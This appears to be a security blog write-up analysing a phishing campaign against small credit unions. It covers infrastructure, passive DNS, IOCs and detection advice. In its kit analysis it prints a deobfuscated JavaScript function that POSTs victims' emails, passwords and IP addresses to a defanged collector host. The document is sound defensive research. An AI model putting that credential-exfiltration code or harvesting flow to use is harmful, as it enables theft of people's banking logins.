Skip to main content
🧪Writeups & Researchintermediate3 min read
•

Analyzing a Real-World Phishing Campaign

Deep dive into a phishing campaign targeting financial institutions. Infrastructure analysis, kit reverse engineering, and IOC extraction.

phishingthreat intelligenceOSINTanalysis
Share:𝕏in⬡✉

Analyzing a Real-World Phishing Campaign

Recently I came across a phishing campaign targeting small credit unions. Here's how I analyzed it, what I found, and the IOCs that came out of it.

Disclaimer: All analysis was performed on safely sandboxed systems. Domains and specific identifiers have been sanitized.

The Initial Sample

The campaign started with emails claiming to be from "Security Team" with urgent account verification requests. Classic tactics:

  • Subject: "Urgent: Verify Your Account Within 24 Hours"
  • Sender spoofed to look like internal IT
  • Link to a convincing login page clone

Infrastructure Analysis

Domain Analysis

The phishing domain secure-creditunion-verify[.]com was registered just 48 hours before the campaign:

Domain: secure-creditunion-verify[.]com
Registrar: NameCheap
Registration: 2025-11-08
Hosting: Bulletproof hosting provider
SSL: Let's Encrypt (valid cert for legitimacy)

Passive DNS

Using PassiveTotal, I found the IP hosting this domain also hosted 12 other suspicious domains—all following similar patterns:

  • account-verify-secure[.]com
  • banking-alert-notice[.]com
  • credential-update-portal[.]com

This indicated a larger operation, not a one-off campaign.

Kit Analysis

Deobfuscation

The phishing page used JavaScript obfuscation to hide its true functionality. After deobfuscation:

// Simplified for readability
function exfiltrate(creds) {
  fetch('https://collector[.]xyz/api/grab', {
    method: 'POST',
    body: JSON.stringify({
      email: creds.email,
      password: creds.password,
      ip: userIP,
      timestamp: Date.now()
    })
  });
}

Admin Panel Discovery

The kit had an exposed admin panel at /admin/login.php (secured only by default credentials—which I did not attempt to access). The directory listing revealed:

/admin/
/logs/
/includes/
/assets/

Credential Harvesting Flow

  1. Victim clicks link in email
  2. Lands on cloned login page
  3. Enters credentials
  4. Credentials POSTed to collector server
  5. Victim redirected to real site (to avoid suspicion)
  6. Attacker receives real-time notification via Telegram bot

IOCs Extracted

Domains

  • secure-creditunion-verify[.]com
  • collector[.]xyz
  • exfil-data[.]net

IPs

  • 185.xxx.xxx.xxx
  • 91.xxx.xxx.xxx

Hashes

  • Phishing kit ZIP: SHA256: a1b2c3...
  • JavaScript loader: SHA256: d4e5f6...

Email Indicators

  • Subject pattern: "Urgent: Verify Your Account"
  • Sender pattern: "security@[target-org]"

Detection Recommendations

  1. Email filtering — Block newly registered domains (<30 days)
  2. DNS monitoring — Alert on lookups to known-bad IPs
  3. User training — Recognize urgency tactics
  4. MFA everywhere — Stolen passwords become useless

Lessons Learned

  • Attackers reuse infrastructure—one IOC can reveal dozens
  • "Bulletproof" hosting isn't bulletproof against analysis
  • Let's Encrypt makes phishing look legitimate
  • Telegram is increasingly used for real-time exfil notifications

Want to learn threat analysis techniques? Contact m1k3@msquarellc.net for training options.

Found this helpful? Share it:

Share:𝕏in⬡✉

Need Help With This?

Have questions about implementing these security practices? Let's discuss your specific needs.

Get in Touch

More in Writeups & Research

Explore more articles in this category.

Browse 🧪 Writeups & Research

Related Articles